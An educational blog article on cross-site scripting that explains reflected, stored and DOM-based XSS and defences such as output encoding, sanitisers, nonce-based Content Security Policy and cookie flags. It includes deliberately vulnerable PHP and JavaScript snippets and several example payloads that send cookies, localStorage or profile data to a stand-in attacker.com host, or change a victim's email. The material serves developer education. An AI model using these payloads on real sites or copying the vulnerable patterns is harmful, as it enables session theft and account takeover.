Understanding Cross-Site Scripting (XSS): How It Works and How to Prevent It in Your Web Apps

Educational Content: This article is written for educational purposes to help developers and cybersecurity students understand software concepts. Always follow ethical guidelines and applicable laws.

Cross-site scripting has been on the OWASP Top 10 for so long that developers sometimes treat it like a solved problem — something the framework handles automatically, or something only old codebases worry about. In practice, XSS vulnerabilities appear in new code every week, including in applications built with modern JavaScript frameworks, because the underlying mechanisms are more nuanced than "escape HTML" and because the attack surface keeps expanding as applications get more dynamic.

This post explains the three types of XSS in detail, walks through real attack scenarios including what attackers actually do once they have script execution, and covers the defense strategy that actually works in modern web applications — including why Content Security Policy matters and where it still falls short.

What Cross-Site Scripting Actually Is

Cross-site scripting is a vulnerability where an attacker manages to inject JavaScript into a page that runs in the context of another user's browser session. The "cross-site" label is historical and somewhat misleading — modern XSS attacks don't always involve different sites. What matters is that untrusted input gets interpreted as executable code by a browser.

The reason this is so dangerous is what JavaScript in a browser session can do. It can read every cookie (including session cookies) accessible to that domain. It can read and exfiltrate the full page DOM — including any sensitive data displayed. It can make authenticated HTTP requests to your API using the victim's session. It can log every keystroke the user makes. It can modify the page appearance — overlaying fake login forms, changing displayed account balances, replacing links. All of this happens invisibly, in the victim's browser, with the victim's permissions.

Reflected XSS: The URL-Based Attack

Reflected XSS occurs when user-supplied data is included in a server response without encoding, and the user can be tricked into visiting a crafted URL containing the malicious payload.

A search page is the canonical example:

<!-- Vulnerable PHP search results page -->
<?php
$query = $_GET['q']; // user-supplied, unvalidated
?>
<h2>Search results for: <?= $query ?></h2>

An attacker sends a victim the URL: https://yoursite.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

When the victim clicks this link, the server reflects the script tag into the HTML response, the browser parses it as JavaScript, and the script runs — sending the victim's cookies to the attacker's server. If that session cookie isn't marked HttpOnly, the attacker can use it to hijack the session completely.

The fix is to HTML-encode any user-supplied data before inserting it into HTML:

<?php
$query = $_GET['q'] ?? '';
// htmlspecialchars converts < > " ' & to their HTML entities
$safe_query = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
?>
<h2>Search results for: <?= $safe_query ?></h2>

The ENT_QUOTES flag is important — without it, single quotes in attribute contexts create separate injection vectors. Always use it.

Stored XSS: The Persistent Attack

Stored XSS is more dangerous than reflected XSS because the malicious payload is saved to the application's database and served to every user who views the affected page, without requiring the victim to click a crafted link.

Comment sections, user profiles, forum posts, product reviews, chat messages, and any other feature where user-supplied text is stored and displayed are all potential stored XSS vectors. An attacker submits a comment containing <script>/* malicious code */</script>, your application stores it, and every subsequent visitor who loads that page receives and executes the script.

The payload in a stored XSS attack can be more sophisticated because it doesn't need to survive URL encoding:

// A stored XSS payload that steals session cookies and sends them to an attacker
<script>
fetch('https://attacker.com/log', {
    method: 'POST',
    body: JSON.stringify({
        cookies: document.cookie,
        url: location.href,
        userAgent: navigator.userAgent,
        localStorage: JSON.stringify(localStorage)
    })
});
</script>

The fix is the same in principle — encode before displaying — but you also need to sanitize before storing, because even if you encode on output correctly today, you might add a raw display somewhere tomorrow:

<?php
// When saving user content
$comment = $_POST['comment'];

// Option 1: Store raw, always encode on output (preferred)
$stmt = $db->prepare("INSERT INTO comments (post_id, user_id, content) VALUES (?, ?, ?)");
$stmt->execute([$post_id, $_SESSION['user_id'], $comment]);

// When displaying:
echo htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');

// Option 2: If you need to allow some HTML (user-submitted rich text)
// Use a proper HTML sanitization library
require 'vendor/autoload.php';
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.Allowed', 'b,i,u,em,strong,a[href],p,br');
$purifier = new HTMLPurifier($config);
$safe_html = $purifier->purify($raw_html_input);

DOM-Based XSS: The Client-Side Vulnerability

DOM-based XSS is distinct from reflected and stored XSS in that the vulnerability lives entirely in client-side JavaScript — no server-side code is involved in the injection. The server sends a legitimate response, but JavaScript in that response reads data from an "attacker-controlled source" and writes it to a "dangerous sink" without sanitization.

Sources include: location.href, location.search, location.hash, document.referrer, window.name. Sinks include: innerHTML, outerHTML, document.write(), eval(), setTimeout() with string arguments, jQuery's $() with untrusted HTML, and location.href when set to attacker-controlled values.

// Vulnerable DOM XSS - reading URL fragment and writing to innerHTML
const hash = location.hash.slice(1); // reads the #... part of the URL
document.getElementById('welcome').innerHTML = 'Hello ' + hash;
// Attacker's URL: https://yoursite.com/dashboard#<img src=x onerror=alert(1)>

// Safe approach - use textContent instead of innerHTML
const hash = location.hash.slice(1);
document.getElementById('welcome').textContent = 'Hello ' + decodeURIComponent(hash);

// Or if you must use innerHTML, sanitize first
const DOMPurify = require('dompurify');
document.getElementById('welcome').innerHTML = 'Hello ' + DOMPurify.sanitize(hash);

DOM XSS is particularly common in single-page applications because JavaScript handles routing and rendering. Any place where your JavaScript reads data from the URL, from postMessage, from localStorage, or from other sources and writes it into the DOM is a potential DOM XSS point.

What Attackers Do With XSS (Beyond Cookie Theft)

Cookie theft via document.cookie is the most well-known XSS exploitation technique, but modern applications have mostly mitigated it through HttpOnly cookies. Attackers have adapted with more sophisticated techniques:

Session riding (CSRF via XSS). Even without accessing the session cookie, an attacker's injected script can make authenticated API requests using the victim's session. The browser automatically includes cookies with same-origin requests. The script can read responses (since it's executing on the same origin as the application) and exfiltrate data or perform actions.

// XSS payload that makes an authenticated request and exfiltrates data
fetch('/api/user/profile')
    .then(r => r.json())
    .then(data => {
        fetch('https://attacker.com/exfil', {
            method: 'POST',
            body: JSON.stringify(data)
        });
    });

// XSS payload that changes email address via the API
fetch('/api/user/update', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({email: 'attacker@evil.com'})
});

Credential harvesting. Replace the login form with a visually identical fake that sends credentials to the attacker. Since the script runs on your domain, the URL in the address bar shows your domain. Users see no indication anything is wrong.

Keylogging. document.addEventListener('keydown', function(e) { /* log and send */ }). Captures everything typed while the victim is on any page of the application.

Account takeover via password reset. Trigger a password reset email request via the API (using the victim's session), or change the victim's email address to attacker-controlled before triggering a password reset.

Content Security Policy: What It Does and Where It Falls Short

Content Security Policy (CSP) is an HTTP response header that tells browsers which sources of scripts, styles, images, and other resources to trust. When correctly configured, it can prevent XSS payloads from loading external resources or sending data to attacker-controlled servers, even when an injection succeeds.

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; img-src 'self' data: https:; connect-src 'self'; frame-ancestors 'none'; base-uri 'self'

This policy says: scripts may only be loaded from the same origin and from trusted-cdn.example.com; inline scripts (<script>...</script>) are blocked; eval() is blocked; data exfiltration to external domains via fetch() is blocked (only 'self' connections are allowed).

CSP significantly raises the bar for XSS exploitation even when an injection point exists. The attacker can inject a script tag, but they can't load their script from an external server, and they can't send data to their server via fetch() or XMLHttpRequest.

However, CSP has important limitations:

Unsafe inline scripts are extremely common. Many applications use inline event handlers (onclick="..."), inline <script> blocks, or JavaScript URLs (href="javascript:...") that require allowing unsafe-inline, which defeats much of CSP's protection.

Nonce-based CSP is the correct approach but complex to implement. A per-page random nonce in the CSP header, added to every legitimate inline script, allows those scripts while blocking injected ones:

<?php
// Generate a fresh nonce for every request
$nonce = base64_encode(random_bytes(18));
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{$nonce}'");
?>
<!-- All legitimate inline scripts get the nonce attribute -->
<script nonce="<?= htmlspecialchars($nonce) ?>">
    // your legitimate inline JavaScript
</script>

DOM-based XSS often bypasses CSP. If the attacker can inject into a script that already exists (rather than injecting a new script tag), or inject into a CSP-allowed sink like an existing trusted script's behavior, the same-origin nature of the attack may not be blocked by the policy.

Defense Strategy That Actually Works

Layer these approaches for comprehensive XSS defense:

Always HTML-encode user-supplied content before inserting it into HTML: htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8'). If you need to allow rich HTML from users, use a server-side sanitization library (HTMLPurifier for PHP, DOMPurify for client-side). Mark session cookies as HttpOnly and Secure to prevent cookie theft even if XSS occurs. Implement a Content Security Policy — even an imperfect one raises the exploitation bar. Avoid innerHTML in JavaScript where possible; use textContent for plain text and createElement for structured HTML. Never use eval(), setTimeout() with string arguments, or document.write(). Implement a strong CSP with nonces for inline scripts if your application uses them. Use the SameSite=Strict or SameSite=Lax cookie attribute to mitigate session riding attacks.

XSS is preventable. It's entirely a matter of consistent encoding discipline and never trusting user-supplied data to be safe for HTML context without explicit sanitization. The frameworks that handle it automatically do so by enforcing this discipline by default — and the vulnerabilities appear when developers work around the default protections.

— Skand K.